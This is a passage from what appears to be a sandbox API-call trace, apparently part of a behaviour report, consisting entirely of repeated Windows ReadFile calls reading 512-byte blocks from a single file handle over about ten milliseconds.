lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile 
(in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 
[0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, 
lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, 
lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: 
lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, 
lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.940] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.940] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.940] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.940] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.940] ReadFile (in: hFile=0x58, 
lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.940] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.940] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.940] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile 
(in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 
[0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, 
